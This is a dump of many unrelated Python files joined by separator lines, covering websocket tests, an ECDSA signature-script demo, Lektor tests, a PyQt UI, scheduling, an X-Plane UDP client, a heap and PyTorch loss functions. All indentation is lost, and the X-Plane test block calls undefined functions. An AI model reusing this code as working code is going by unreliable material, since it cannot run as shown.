topics_rules=[
('gim.front.foo', ws.TOPIC_TYPE_EXACT),
('gim.front.baz', ws.TOPIC_TYPE_PREFIX),
], iteration=2)
self.assertEqual(result, {
'missed_messages': [
{'args': [111111], 'kwargs': {'b': 222222,
'ws_extra': {'topic': 'gim.front.foo', 'msg_id': 6,
'subscribed': [('gim.front.foo', ws.TOPIC_TYPE_EXACT), ]}}},
{'args': [1111111], 'kwargs': {'b': 2222222,
'ws_extra': {'topic': 'gim.front.baz', 'msg_id': 7,
'subscribed': [('gim.front.baz', ws.TOPIC_TYPE_PREFIX), ]}}},
{'args': [11111111], 'kwargs': {'b': 22222222,
'ws_extra': {'topic': 'gim.front.baz2', 'msg_id': 8,
'subscribed': [('gim.front.baz', ws.TOPIC_TYPE_PREFIX), ]}}},
],
'max_msg_id': 8, # max in `missed_messages`, also the last at fetch time
'last_msg_id': 8,
'iteration': 2.
})
result = yield self.reconciler.get_data(last_received_id=4, next_received_id=None,
topics_rules=[
('gim.front.foo', ws.TOPIC_TYPE_EXACT),
], iteration=1)
self.assertEqual(result, {
'missed_messages': [
{'args': [111111], 'kwargs': {'b': 222222,
'ws_extra': {'topic': 'gim.front.foo', 'msg_id': 6,
'subscribed': [('gim.front.foo', ws.TOPIC_TYPE_EXACT), ]}}},
],
'max_msg_id': 8, # the last at fetch time
'last_msg_id': 8,
'iteration': 1.
})
# We shouldn't have a lock on iteration < 5
with patch.object(self.publisher, 'lock_publishing', autospec=True) as locked:
result = yield self.reconciler.get_data(last_received_id=4, next_received_id=8,
topics_rules=[
('gim.front.foo', ws.TOPIC_TYPE_EXACT),
('gim.front.baz', ws.TOPIC_TYPE_PREFIX),
], iteration=1)
self.assertEqual(locked.call_count, 0)
self.assertEqual(result, {
'missed_messages': [
{'args': [111111], 'kwargs': {'b': 222222,
'ws_extra': {'topic': 'gim.front.foo', 'msg_id': 6,
'subscribed': [('gim.front.foo', ws.TOPIC_TYPE_EXACT), ]}}},
{'args': [1111111], 'kwargs': {'b': 2222222,
'ws_extra': {'topic': 'gim.front.baz', 'msg_id': 7,
'subscribed': [('gim.front.baz', ws.TOPIC_TYPE_PREFIX), ]}}},
],
'max_msg_id': 8, # `next_received_id`, also the last at fetch time
'last_msg_id': 8,
'iteration': 1.
})
# We should have a lock on iteration 5
with patch.object(self.publisher, 'lock_publishing', autospec=True) as locked:
result = yield self.reconciler.get_data(last_received_id=4, next_received_id=7,
topics_rules=[
('gim.front.foo', ws.TOPIC_TYPE_EXACT),
('gim.front.baz', ws.TOPIC_TYPE_PREFIX),
], iteration=5)
locked.assert_called_once_with()
self.assertEqual(result, {
'missed_messages': [
{'args': [111111], 'kwargs': {'b': 222222,
'ws_extra': {'topic': 'gim.front.foo', 'msg_id': 6,
'subscribed': [('gim.front.foo', ws.TOPIC_TYPE_EXACT), ]}}},
],
'max_msg_id': 8, # the last at fetch time
'last_msg_id': 8,
'iteration': 5.
})
|
# -*- coding: utf-8 -*-
import ECDSA
import ExtendedStack as st
import sys
# 남은 횟수 없을 시 종료
def error_check(cnt):
if cnt <= 0:
sys.exit()
else:
return
def hashing(pubkey):
Qx = pubkey[0]
Qy = pubkey[1]
Qx_bytes = Qx.to_bytes(32, 'big')
Qy_bytes = Qy.to_bytes(32, 'big')
Hash_Qx = ECDSA.Hashing(Qx_bytes)
Hash_Qy = ECDSA.Hashing(Qy_bytes)
Hash_Qx = ''.join(format(x, '02x') for x in Hash_Qx)
Hash_Qy = ''.join(format(x, '02x') for x in Hash_Qy)
return Hash_Qx, Hash_Qy
print("=========================================")
print("메시지를 입력하세요.")
msg = input()
print('\n')
print("키를 생성합니다.\n")
privateKey, publicKey = ECDSA.make_key()
print("서명을 생성합니다.\n")
signature = ECDSA.make_signature(msg, privateKey)
print("생성된 메시지, 키, 서명은 다음과 같습니다.\n")
print("메시지 : ", msg)
print("\n")
print("개인키 : ", hex(privateKey))
print("\n")
print("공개키 : Qx, Qy")
print("Qx : ", hex(publicKey[0]))
print("Qy : ", hex(publicKey[1]))
print("\n")
print("서명 : r, s")
print("r : ", hex(signature[0][0]))
print("s : ", hex(signature[0][1]))
print("\n")
print("공개키의 해시 값 : LSH(Qx), LSH(Qy)")
hx, hy = hashing(publicKey)
print("LSH(Qx) : ", '0x' + hx)
print("LSH(Qy) : ", '0x' + hy)
print("=========================================")
stack, cnt = st.init()
print("모드를 입력하세요.")
print("생성된 서명과 공개키로 서명 검증 확인 (검증 성공) : 1")
print("임의의 공개키에 대한 해시값 생성 (검증 실패) : 2")
print("임의의 공개키를 생성 (검증 실패) : 3")
print("임의의 서명 생성 (검증 실패) : 4")
print("직접 입력 (올바른 입력 시 검증 성공) : 5")
mode = int(input("mode : "))
if mode not in [1, 2, 3, 4, 5]:
print("다시 입력하세요.")
mode = int(input("mode : "))
while True:
# ECDSA 모듈에서 서명 생성 시 (r, s), (r, -s) 2가지 서명 생성
# (r, s)를 사용하기 위해 signature[0]를 택함.
scripts, scriptPubKey, scriptSig, cnt = st.make_script(cnt, signature[0], publicKey, msg, mode)
scripts, cnt, valid = st.scripts_to_queue(scripts, cnt)
if cnt <= 0 or valid == True:
break
error_check(cnt)
print("=========================================")
print("scriptPubKey : ", end = "")
for scr in scriptPubKey:
print(scr, end = " ")
print('\n')
print("scriptSig : ", end = "")
for scr in scriptSig:
print(scr, end=" ")
print('\n')
print("=========================================")
print('\n')
while scripts.empty() == False:
stack, valid = st.oper(stack, msg, scripts)
if valid == False:
break
error_check(cnt)
print('\n')
print("=========================================")
print("최종 결과")
if len(stack) == 1 and stack[0] == "True":
print("서명 검증에 성공하였습니다.")
print("UnLocking Success")
else:
print("서명 검증에 실패하였습니다.")
print("UnLocking Fail")
st.print_stack(stack)
input("엔터를 누르면 종료합니다.") |
a='oM sai rAm'
print(a.title())
print(a.lower())
print(a.capitalize())
# usecase4
test_str = "PyThoN"
print("The original string is : " + str(test_str))
res = [char for char in test_str if char.isupper()]
a=list(res)
for i in a:
print("The uppercase characters in string are : " + i)
|
from datetime import date, datetime, timezone
from jinja2 import Undefined
# This is a workaround for lektor/lektor#974 in lektor==3.3
from lektor import environment # noqa: F401
from lektor import types
import pytest
@pytest.fixture
def env():
return DummyEnv()
def raw_value(value):
name = 'test'
field = None
pad = None
return types.RawValue(name, value, field, pad)
class TestComparableDate(object):
def make_one(self, year=1970, month=1, day=1):
from lektor_datetime_helpers import comparable_date
return comparable_date(year, month, day)
def test_compare_to_date(self):
left = self.make_one(1970, 1, 2)
assert left == date(1970, 1, 2)
def test_compare_to_naive_datetime(self):
left = self.make_one(1970, 1, 2)
assert left < datetime(1970, 1, 2)
assert left > datetime(1970, 1, 1, 23, 59, 59)
def test_compare_to_tzaware_datetime(self):
left = self.make_one(1970, 1, 2)
assert left < datetime(1970, 1, 2, tzinfo=timezone.utc)
assert left > datetime(1970, 1, 1, 23, 59, 59, tzinfo=timezone.utc)
def test_compare_to_integer(self):
left = self.make_one(1970, 1, 2)
with pytest.raises(TypeError):
left < 0 # noqa: B015
def test_compare_to_none(self):
left = self.make_one(date.min.year, date.min.month, date.min.day)
assert left > None
def test_hash(self):
dt = self.make_one()
assert isinstance(hash(dt), int)
class TestComparableDatetime(object):
def make_one(self, year=1970, month=1, day=1,
hour=0, minute=0, second=0, tzinfo=None):
from lektor_datetime_helpers import comparable_datetime
return comparable_datetime(year, month, day,
hour, minute, second, tzinfo=tzinfo)
def test_compare_to_date(self):
left = self.make_one(1970, 1, 2)
assert left > date(1970, 1, 2)
assert left < date(1970, 1, 3)
def test_compare_to_naive_datetime(self):
left = self.make_one(1970, 1, 2)
assert left == datetime(1970, 1, 2)
def test_compare_to_tzaware_datetime(self):
left = self.make_one(1970, 1, 2)
assert left < datetime(1970, 1, 2, tzinfo=timezone.utc)
def test_compare_to_integer(self):
left = self.make_one(1970, 1, 2)
with pytest.raises(TypeError):
left < 0 # noqa: B015
def test_compare_to_none(self):
left = self.make_one(
datetime.min.year, datetime.min.month, datetime.min.day,
datetime.min.hour, datetime.min.minute, datetime.min.second)
assert left > None
def test_hash(self):
dt = self.make_one()
assert isinstance(hash(dt), int)
class TestDateOrDateTimeType(object):
@pytest.fixture
def type_(self, env):
from lektor_datetime_helpers import DateOrDateTimeType
options = None
return DateOrDateTimeType(env, options)
def test_missing(self, type_):
value = type_.value_from_raw(raw_value(None))
assert isinstance(value, Undefined)
assert not isinstance(value, types.BadValue)
def test_date(self, type_):
value = type_.value_from_raw(raw_value('2017-04-01'))
assert isinstance(value, date)
def test_datetime(self, type_):
value = type_.value_from_raw(raw_value('2017-04-01 12:04'))
assert isinstance(value, datetime)
def test_bad_value(self, type_):
value = type_.value_from_raw(raw_value('Not a date'))
assert isinstance(value, types.BadValue)
class TestPlugin(object):
@pytest.fixture
def plugin(self, env):
from lektor_datetime_helpers import DatetimeHelpersPlugin
id_ = 'test-plugin'
return DatetimeHelpersPlugin(env, id_)
def test_localize_aware_datetime(self, plugin):
dt = datetime(2017, 4, 1, 12, 34, tzinfo=timezone.utc)
localized = plugin.localize_datetime(dt)
assert localized is dt
def test_localize_naive_datetime(self, plugin):
plugin.on_setup_env()
dt = datetime(2017, 4, 1, 12, 34)
localized = plugin.localize_datetime(dt)
assert localized is not dt
assert localized == dt.astimezone()
def test_isoformat(self, plugin):
dt = date(2017, 4, 1)
assert plugin.isoformat(dt) == '2017-04-01'
class DummyEnv(object):
def __init__(self):
self.jinja_env = DummyJinjaEnv()
self.types = set()
def add_type(self, type_):
self.types.add(type_)
class DummyJinjaEnv(object):
def __init__(self):
self.filters = {}
|
from ._title import Title
from plotly.graph_objs.layout.scene.zaxis import title
from ._tickformatstop import Tickformatstop
from ._tickfont import Tickfont
|
import PyQt5.QtCore as qc
import PyQt5.QtWidgets as qw
from game import Game
class UI(qw.QWidget):
objectCount = 1
gravitation_modifier = 1
timeInterval = 100
windowWidth = 500
windowHeight = 500
widthSlider = None
heightSlider = None
game = None
gridLayout = None
def __init__(self):
super().__init__()
self.setWindowTitle("Settings")
self.initUiElements()
self.default()
def default(self):
self.objectCount = 3
self.gravitation_modifier = 1
self.timeInterval = 100
self.windowWidth = 500
self.windowHeight = 500
self.widthSlider.setValue(self.windowWidth)
self.heightSlider.setValue(self.windowHeight)
self.objectCountSlider.setValue(self.objectCount)
def initUiElements(self):
widthSlider = qw.QSlider(qc.Qt.Horizontal)
widthSlider.setMinimum(100)
widthSlider.setMaximum(1000)
widthSlider.valueChanged.connect(self.setWindowWidth)
widthSlider.setToolTip("Set horizontal size")
self.widthSlider = widthSlider
heightSlider = qw.QSlider(qc.Qt.Horizontal)
heightSlider.setMinimum(100)
heightSlider.setMaximum(1000)
heightSlider.valueChanged.connect(self.setWindowHeight)
heightSlider.setToolTip("Set vertical size")
self.heightSlider = heightSlider
objectCountSlider = qw.QSlider(qc.Qt.Horizontal)
objectCountSlider.setMinimum(1)
objectCountSlider.setMaximum(5)
objectCountSlider.valueChanged.connect(self.setObjectCount)
objectCountSlider.setToolTip("Set number of objects")
self.objectCountSlider = objectCountSlider
self.startGameButton = qw.QPushButton("Start")
self.startGameButton.setToolTip("Start the game")
self.startGameButton.clicked.connect(self.startGame)
self.resetButton = qw.QPushButton("Reset settings")
self.resetButton.clicked.connect(self.default)
self.gridLayout = qw.QGridLayout(self)
row = 0
def addToLayout(name, element):
nonlocal row
self.gridLayout.addWidget(qw.QLabel(name), row, 0)
self.gridLayout.addWidget(element, row, 1)
self.gridLayout.addWidget(qw.QLabel(), row, 2)
row += 1
addToLayout("Width", widthSlider)
addToLayout("Height", heightSlider)
addToLayout("Anzahl Objekte", objectCountSlider)
self.gridLayout.addWidget(self.startGameButton, row, 0, 1, 3)
self.gridLayout.addWidget(self.resetButton, row + 1, 0, 1, 3)
def updateValueText(self, slider, postfix=""):
index = self.gridLayout.indexOf(slider)
label = self.gridLayout.itemAt(index + 1).widget()
label.setText(str(slider.value()) + postfix)
def setWindowWidth(self, value):
self.windowWidth = value
self.updateValueText(self.widthSlider, "px")
def setWindowHeight(self, value):
self.windowHeight = value
self.updateValueText(self.heightSlider, "px")
def setObjectCount(self, value):
self.objectCount = value
self.updateValueText(self.objectCountSlider, " Objekt/e")
def startGame(self):
self.game = Game(self, self.objectCountSlider)
self.game.show()
self.game.closeEvent = self.gameClosed
self.hide()
def gameClosed(self, _):
self.game.timer.stop()
self.show()
|
#! /usr/bin/env python
# Processing Order with deadlines
from ortools.constraint_solver import pywrapcp
import pudb
import matplotlib.pyplot as plt
# pudb.set_trace()
def main():
# Define Data
num_orders = 4
num_products = 3
all_products = range(0, num_products)
all_orders = range(0, num_orders)
orders = [[0, 1, 2],
[0, 1],
[1, 2],
[0, 2]
]
processing_times = [[5, 2, 3],
[3, 4, 5],
[2, 5],
[2, 1]
]
deadlines = [15, 45, 30, 35]
required_times = [sum(i) for i in processing_times]
# Horizon
horizon = max(deadlines)
solver = pywrapcp.Solver("ProcessOrder")
# find Processing Times and create sequence variable
# Creating TASKS
# task(i, j) = represents i-th order and j-th product task
all_tasks = {}
for i in all_orders:
for j in range(len(orders[i])):
all_tasks[(i, j)] = solver.FixedDurationIntervalVar(0,
deadlines[i],
processing_times[i][j],
False,
'Order_%i_Product_%i' % (i, j)
)
# Instantiate Solver
# print("All TASKS: ")
# print(all_tasks)
print("Problem Information".center(60, '*'))
print("ProductTypes: ", [_ for _ in all_products])
print("Total Orders: ", len(orders))
for i, order in enumerate(orders):
print('Order %i -- %s'%(i, order))
print(" Processing Times ".center(40, '='))
for i, time in enumerate(required_times):
print('Order %i -- %i'%(i, time))
print(" Deadlines ".center(40, '='))
for i, deadline in enumerate(deadlines):
print('Order %i -- %i'%(i, deadline))
print("Solution".center(60, '*'))
# Algorithm
# 1. Find Maximum Order Deadline
totalTimeSlots = []
tmp_deadlines = list(deadlines)
tmp_required_times = list(required_times)
while len(tmp_deadlines)>0:
maxDeadline = max(tmp_deadlines)
maxIndex = tmp_deadlines.index(maxDeadline)
orderIndex = deadlines.index(maxDeadline)
requiredTime = tmp_required_times[maxIndex]
timeSlots = {}
timeSlots["start"] = maxDeadline - requiredTime
timeSlots["end"] = maxDeadline
timeSlots["orderIndex"]=orderIndex
totalTimeSlots.append(timeSlots)
del tmp_required_times[maxIndex]
del tmp_deadlines[maxIndex]
optimizedTimeSlot = []
# Find Required Shift Needed
# Apply Shift to all
# get orderedlist as per start date
ordered_list = sorted(totalTimeSlots, key = lambda k: k['start'])
# Setting Initial Time to 0
# Matching End time of Order i with start of Order (i+1)
for i, order in enumerate(ordered_list):
if i == 0:
shift = ordered_list[i]['start']-0
else:
shift = ordered_list[i]['start']-ordered_list[i-1]['end']
order['start'] -= shift
order['end'] -= shift
print("Optimized List")
for order in ordered_list:
print("Order %i - (%i, %i) " % (order['orderIndex'], order['start'],
order['end']))
# Order list by start and End
# Plotting Figure
if __name__=='__main__':
main()
|
#!/usr/bin/env python
# ----------------------------------------------------------
# XPlane Connect for F16Glass
# ----------------------------------------------------------
# This module handels and stores all aircraft data, and communicated via FSUIPC to FS2004
#
#
# ---------------------------------------------------------------
import threading
import time
import logging
import struct
import config
#from socket import *
import socket
#Constants
#DataTypes
INT32 = 1
INT64 = 2
FLOAT32 = 3
FLOAT64 = 4
STRING8 = 5
STRING32 = 6
STRING64 = 7
STRING128 = 8
STRING256 = 9
#Header length
HEADER_len = 12
#class data_obj(object):
#Used to make a object for Definition to link to
# def __init__(self, value, pack_s):
# self.value = value
# self.adjusted = value #Used incase value needs to be adjusted from data inputed from FSX.
# self.pack_s = pack_s
class empty_event(object):
def send(self):
logging.debug("Pass, no function associated with this event to do.")
class event_obj(object):
#Used to hold send event, with its data
def __init__(self,value):
self.value = value
self.event_id = 0 #Set for 0 initially, will be equal to index of event list for this object
self.event = empty_event()
class XPlaneUDP_Client_c(threading.Thread):
def __init__(self, recieve):
self.clock = time.time()
self.count = 0
self.kill_timer = 0
threading.Thread.__init__(self)
self.started = False
self.read_buffer = ''
self.packet_data = []
self.go = True
self.recieve = recieve
def reset(self):
self.count = 0
self.kill_timer = 0
self.read_buffer = ''
self.packet_data=[]
def send(self, data):
#Send to server UDP
self.s.sendto(data, self.addr)
logging.debug("UDP OUT: %s %r", data, self.addr)
def start_client(self):
if self.started==False:
logging.info("XPlaneConnect: Starting Thread")
self.start()
self.started=True
def connect(self, addr, port):
#Attempts to connect to XPLANE.
self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#self.s.settimeout(config.timeout)
#self.s.connect((addr, port))
#self.s.setblocking(0)
self.addr = (addr,port)
#Send connection header
#self.s.settimeout(None)
self.s.settimeout(2)
#self.s.setblocking(0)
logging.info("XPlane Connect: Sending Connect string")
self.send('CONNECT') #The initial connect attempt to XPLANE
self.connected=True
def close(self):
self.go = False
if hasattr(self, 's'):
self.s.close()
def run(self):
def reset_timer():
#used to reset the kill timer.
#Called from RJGlass to reset timer, if timer isn't reset then thread will die.
self.kill_timer = 0
def decode_data(length, packet_type):
#Used to look for and read anydata that is coming in.
#Take data from buffer minus header
data = self.read_buffer[12:length]
self.read_buffer = self.read_buffer[length:]
#print "%r" %data
self.packet_data.append([packet_type, data])
#print "PD", self.packet_data
return len(self.packet_data)
#print self.packet_data
#Begin self.receive()
self.go = True
logging.info("XPlaneConnect: Server Starting")
while self.go:
#print "SERVER LOOP"
#print time.time()-self.clock
#try:
if self.recieve:
try:
r, addr2 = self.s.recvfrom(1024)
logging.debug("UDP RECV (%d) %r ", len(r), r)
except socket.timeout:
r = ''
logging.debug("UDP RECV Timedout")
except socket.error,e:
#logging.warning("UDP Error %r", e)
self.connected = False
r = ""
else:
r = ''
#r =self.s.recv(1024)
#print "%r" %r
#self.read_buffer = self.read_buffer + r
self.read_buffer = r
logging.debug("Recived Buffer (%d) %r", len(r), r)
#except:
# pass
#self.kill_timer += 1 #This is used to kill thread, if RJGlass crashes, or locks up.
#if self.kill_timer>200:
# self.go = False
# print "Error: No Data to Recieve"
#l = len(self.read_buffer)
#while l>=12: #If not atleast 12bytes than no buffer.
# out = decode_header(self.read_buffer)
# if out[1]== self.protocol: #Check to see if protocol is correct
# status = True #Used in return value
#print "Header ", out
# if l>=out[0]: #Make sure buffer is large enough for entire data
# num = decode_data(out[0], out[2]) #The length and type is send to decode data
#print time.time(), "Packet" , out[0]
# l = len(self.read_buffer)
# if num > 130: #If data is not being read then close thread.
#This is so the thread wont run forever.
# self.go = False
# print "RJGlass is not reading input buffer, exiting client thread."
#If data is decoded it will be sent to self.packet_data list.
#print time.time()-self.clock, out[0], out[2]
# else:
# print self.app_name, "Error: Length not correct" , l, out[0]
# l=0 #bad data forces while loop to exit
# else: #If protocol wrong then error in transmission clear buffer
#self.read_buffer = ''
# l=0 #forces loop to exit
# print self.app_name, "Error in Data: Protocol Wrong, Read_Buffer cleared" , out[1]
#print time.time(), "PD < 12"
#Check read buffer
#print "%r" %self.read_buffer
#print "Break"
#time.sleep(3)
#Quit thread
self.s.close()
class XPdata_obj(object):
def __init__(self, var, func=None):
self.var = var
self.func = func
class outdata_c(object):
#Outdata is data sent from XPlane to GlassServer
#This provides group of outdata
def __init__(self):
self.list = []
self.outpack_s = ''
self.outpack_size = 0
def add(self, addr, data_s, obj, func):
self.list.append(XPdata_obj(obj, func))
self.outpack_s += data_s #Overall pack string
self.outpack_size = struct.calcsize(self.outpack_s)
#print self.outpack_size
class XPlaneUDP(object):
def __init__(self, recieve):
#Initalizes SimConnect
#Depending on your FSX_version you are connecting to, need to set protocol etc.
# self.read_buffer = ''
#Set outdata as two groups High Priority, Low Priority
self.HP_outdata = outdata_c()
self.LP_outdata = outdata_c()
#self.outdata = [self.HP_oudata, self.LP_outdata]
self.connected = False
#self.aircraft = aircraft
self.indata_list = []
self.inpack_list = []
self.client = XPlaneUDP_Client_c(recieve)
self.data_list = [] #Sets up data list will be object eventually
def connect(self, addr, port, connect):
self.client.connect(addr,port)
if connect: self.client.start_client()
self.connected = True
def close(self):
#Closes the connection with XPlane
self.client.close()
def send_data(self):
out_s = ''
index = 0
for item in self.indata_list:
out_s += struct.pack(self.inpack_list[index],item.value)
index += 1
self.client.send(out_s)
logging.debug("XPlaneConnect: Client Out %r", out_s)
def receive(self):
def unpack_data(outdata,data):
out = struct.unpack(outdata.outpack_s, data[1:])
#print out
count = 0
#print out
for item in outdata.list:
#print count, out[count]
#Possible functio here?
item.var.client_set(out[count])
count += 1
def decode_data(data):
id = struct.unpack('c', data[0])
logging.debug("XPlaneConnect: ID %s received", id[0])
if id[0] == '1': #High Priority outdata
#Main Data struct
unpack_data(self.LP_outdata, data)
elif id[0] == '2':
#print "ID 2"
pass
status = False #Check packet data to see if any data is in there.
logging.debug("XPlaneConnect : Readbuffer %d %r", len(self.client.read_buffer), self.client.read_buffer)
#print self.LP_outdata.outpack_size
if len(self.client.read_buffer) == self.LP_outdata.outpack_size + 1:
#print "Decoding Packet", len(self.client.packet_data)
#print len(self.client.read_buffer), "%r" %self.client.read_buffer
status = True
decode_data(self.client.read_buffer)
#print "R BUFFER %r " %self.client.read_buffer
self.client.read_buffer = ''
else:
pass #print "WRONG SIZE", len(self.client.read_buffer)
#define_id.append(decode_packet(self.client.packet_data.pop(0)))
return status
def output(self):
while len(self.client.packet_data) >0:
i = self.client.packet_data.pop(0)
logging.debug("XPlaneConnect: Packet Recv : %d %r", len(i[1]),i)
def indata_add(self, addr, data_s, obj):
self.indata_list.append(obj)
self.inpack_list.append(data_s) #Overall pack string
#self.inpack_size = struct.calcsize(self.inpack_s)
if __name__ == '__main__':
s = XPlaneUDP(True)
s.connect('192.168.1.40', 1500, True)
s.receive()
#s.Load_Flightplan('DTWCVG')
clientID = 2
defineID = 5
alt = data_obj(200.0)
ias = data_obj(200.0)
s.mapClientDatatoID("TestCDataArea2", clientID)
s.definition_0 = s.create_ClientDataDefinition(defineID)
s.def1 = s.create_DataDefinition(3)
s.def1.add("Indicated Altitude", "feet", FLOAT32, alt)
s.def1.add("Airspeed Indicated", "knots", FLOAT32, ias)
airspeed = data_obj(0)
#s.definition_0.add('Airspeed',FLOAT64, airspeed)
#s.definition_0.add('Airspeed',FLOAT64, alt)
#s.definition_0.add('Airspeed',FLOAT64, ias)
s.output()
#Loop
f = 22.26
i = 3
for i in range(10):
#s.definition_0.request(clientID, 2, ClientDataDefinition.ONCE)
#s.def1.request(3,DataDefinition.USER, DataDefinition.ONCE, interval = 0)
s.requestAIData(3, 5000, 2)
#s.sendClientData(2,5, struct.pack('<ddd', i,f,f))
#i+=1
#f+=1.4
#print airspeed.value
#s.receive()
#alt = data_obj(200.0)
#s.definition_0.add("Indicated Altitude", "feet", FLOAT32, alt)
#AGL = alt.get
time.sleep(2)
#s.output()
s.receive()
#print s.def1.AI_data
#s.definition_0.request(4, DataDefinition.USER, DataDefinition.VISUAL_FRAME, interval = 10)
#while True:
time.sleep(13)
s.close()
|
import click
# see : http://click.pocoo.org/6/commands/#multi-command-pipelines
@click.group(chain=True, invoke_without_command=True)
@click.option('-i', '--input', type=click.File('r'))
def cli(input):
pass
@cli.resultcallback()
def process_pipeline(processors, input):
iterator = (x.rstrip('\r\n') for x in input)
for processor in processors:
iterator = processor(iterator)
for item in iterator:
click.echo(item)
@cli.command('uppercase')
def make_uppercase():
def processor(iterator):
for line in iterator:
yield line.upper()
return processor
@cli.command('lowercase')
def make_lowercase():
def processor(iterator):
for line in iterator:
yield line.lower()
return processor
@cli.command('strip')
def make_strip():
def processor(iterator):
for line in iterator:
yield line.strip()
return processor
if __name__ == '__main__':
cli()
|
class Node:
def __init__(self, value, priority):
self.value = value
self.priority = priority
def get_priority(self):
return self.priority
def get_value(self):
return self.value
# we will be using min heap for this
class PriorityQueue:
def __init__(self):
self.values = []
def enqueue(self, value, priority):
new_node = Node(value, priority)
self.insert(new_node)
def insert(self, node):
if len(self.values) <= 0:
self.values.append(node)
return
self.values.append(node)
index = len(self.values) - 1
parent_index = (index - 1) // 2
while self.values[index].get_priority() < self.values[parent_index].get_priority() and parent_index >= 0:
self.values[parent_index], self.values[index] = self.values[index], self.values[parent_index]
index = parent_index
parent_index = (index - 1) // 2
def dequeue(self):
return self.extract_min()
def extract_min(self):
if len(self.values) <= 0:
return None
if len(self.values) == 1:
return self.values.pop()
length = len(self.values) - 1
self.values[0], self.values[length] = self.values[length], self.values[0]
return_node = self.values.pop()
index = 0
while True:
left_child = (2*index) + 1
right_child = (2 * index) + 2
if left_child < 0 or left_child >= length:
return return_node
if right_child < 0 or right_child >= length:
return return_node
# \ is for simplified operation, in python in expression if we wanna go to new line, we use \
if self.values[index].get_priority() < self.values[left_child].get_priority() and self.values[index].get_priority() < self.values[right_child].get_priority():
return return_node
if self.values[index].get_priority() > self.values[right_child].get_priority() > self.values[left_child].get_priority():
self.values[index], self.values[left_child] = self.values[left_child], self.values[index]
index = left_child
continue
if self.values[index].get_priority() > self.values[left_child].get_priority() > self.values[right_child].get_priority():
self.values[index], self.values[right_child] = self.values[right_child], self.values[index]
index = right_child
continue
if self.values[index].get_priority() > self.values[left_child].get_priority():
self.values[index], self.values[left_child] = self.values[left_child], self.values[index]
index = left_child
continue
if self.values[index].get_priority() > self.values[right_child].get_priority():
self.values[index], self.values[right_child] = self.values[right_child], self.values[index]
index = right_child
continue
def returnQueue(self):
return_heap = []
for i in range(len(self.values)):
value_priority_pair = {self.values[i].get_priority(): self.values[i].get_value()}
return_heap.append(value_priority_pair)
return return_heap
|
from django.shortcuts import render
from hello_django_app.models import Recipe, Ingredient
# Create your views here.
def index(request):
selected = list(map(int, request.GET.getlist('ingredient[]', [])))
ingredients_list = Ingredient.objects.order_by('title')
recipes_list = Recipe.objects.order_by('title') \
# .filter(proportions__in=selected) \
# .distinct()
context = {
'selected_ingredients': selected,
'ingredients_list': ingredients_list,
'recipes_list': recipes_list,
}
return render(request, 'index.html', context)
|
import os
import re
import random
import math
import torch
import torch.nn as nn
import numpy as np
import cv2
INTER_MODE = {'NEAREST': cv2.INTER_NEAREST, 'BILINEAR': cv2.INTER_LINEAR, 'BICUBIC': cv2.INTER_CUBIC}
class CrossEntropyLabelSmooth(nn.Module):
def __init__(self,num_classes, epsilon,gamma,weight=None):
super(CrossEntropyLabelSmooth, self).__init__()
self.num_classes = num_classes
self.epsilon = epsilon
self.softmax = nn.Softmax(dim=1)
self.gamma = gamma
self.weight = weight
def forward(self, inputs, targets):
probs = self.softmax(inputs)
log_probs = torch.log(probs)
targets = torch.zeros_like(log_probs).scatter_(1, targets.unsqueeze(1), 1)
targets = (1 - self.epsilon) * targets + self.epsilon / self.num_classes
# loss = (-targets * log_probs).mean(0).sum()
if(self.weight==None):
loss = (-(torch.pow((1-probs), self.gamma))*log_probs).mean(0).sum()#mean(0)按列求均值
else:
weight = self.weight.expand(inputs.shape)
loss = (-weight*(torch.pow((1-probs), self.gamma))*log_probs).mean(0).sum()#mean(0)按列求均值
return loss
class CenterLoss(nn.Module):
"""Center loss.
Reference:
Wen et al. A Discriminative Feature Learning Approach for Deep Face Recognition. ECCV 2016.
Args:
num_classes (int): number of classes.
feat_dim (int): feature dimension.
"""
def __init__(self, num_classes=10, feat_dim=2, use_gpu=True):
super(CenterLoss, self).__init__()
self.num_classes = num_classes
self.feat_dim = feat_dim
self.use_gpu = use_gpu
if self.use_gpu:
self.centers = nn.Parameter(torch.randn(self.num_classes, self.feat_dim).cuda())
else:
self.centers = nn.Parameter(torch.randn(self.num_classes, self.feat_dim))
def forward(self, x, labels):
"""
Args:
x: feature matrix with shape (batch_size, feat_dim).
labels: ground truth labels with shape (batch_size).
"""
batch_size = x.size(0)
distmat = torch.pow(x, 2).sum(dim=1, keepdim=True).expand(batch_size, self.num_classes) + \
torch.pow(self.centers, 2).sum(dim=1, keepdim=True).expand(self.num_classes, batch_size).t()
distmat.addmm_(1, -2, x, self.centers.t())
classes = torch.arange(self.num_classes).long()
if self.use_gpu: classes = classes.cuda()
labels = labels.unsqueeze(1).expand(batch_size, self.num_classes)
mask = labels.eq(classes.expand(batch_size, self.num_classes))
dist = distmat * mask.float()
loss = dist.clamp(min=1e-12, max=1e+12).sum() / batch_size
return loss
def mixup_data(x, y, alpha=0.2, use_cuda=True):
'''Returns mixed inputs, pairs of targets, and lambda'''
if alpha > 0:
lam = np.random.beta(alpha, alpha)
else:
lam = 1
batch_size = x.size()[0]
if use_cuda:
index = torch.randperm(batch_size).cuda()
else:
index = torch.randperm(batch_size)
mixed_x = lam * x + (1 - lam) * x[index, :]
y_a, y_b = y, y[index]
return mixed_x, y_a, y_b, lam
def mixup_criterion(criterion, pred, y_a, y_b, lam):
return lam * criterion(pred, y_a) + (1 - lam) * criterion(pred, y_b)
class RandomErasing:
"""Random erasing the an rectangle region in Image.
Class that performs Random Erasing in Random Erasing Data Augmentation by Zhong et al.
Args:
sl: min erasing area region
sh: max erasing area region
r1: min aspect ratio range of earsing region
p: probability of performing random erasing
"""
def __init__(self, p=0.5, sl=0.02, sh=0.4, r1=0.3):
self.p = p
self.s = (sl, sh)
self.r = (r1, 1/r1)
def __call__(self, img):
"""
perform random erasing
Args:
img: opencv numpy array in form of [w, h, c] range
from [0, 255]
Returns:
erased img
"""
assert len(img.shape) == 3, 'image should be a 3 dimension numpy array'
if random.random() > self.p:
return img
else:
while True:
Se = random.uniform(*self.s) * img.shape[0] * img.shape[1]
re = random.uniform(*self.r)
He = int(round(math.sqrt(Se * re)))
We = int(round(math.sqrt(Se / re)))
xe = random.randint(0, img.shape[1])
ye = random.randint(0, img.shape[0])
if xe + We <= img.shape[1] and ye + He <= img.shape[0]:
img[ye : ye + He, xe : xe + We, :] = np.random.randint(low=0, high=255, size=(He, We, img.shape[2]))
return img
if __name__ == "__main__":
img = cv2.imread("test.jpg")
RE = RandomErasing(p=0.5)
for i in range(20):
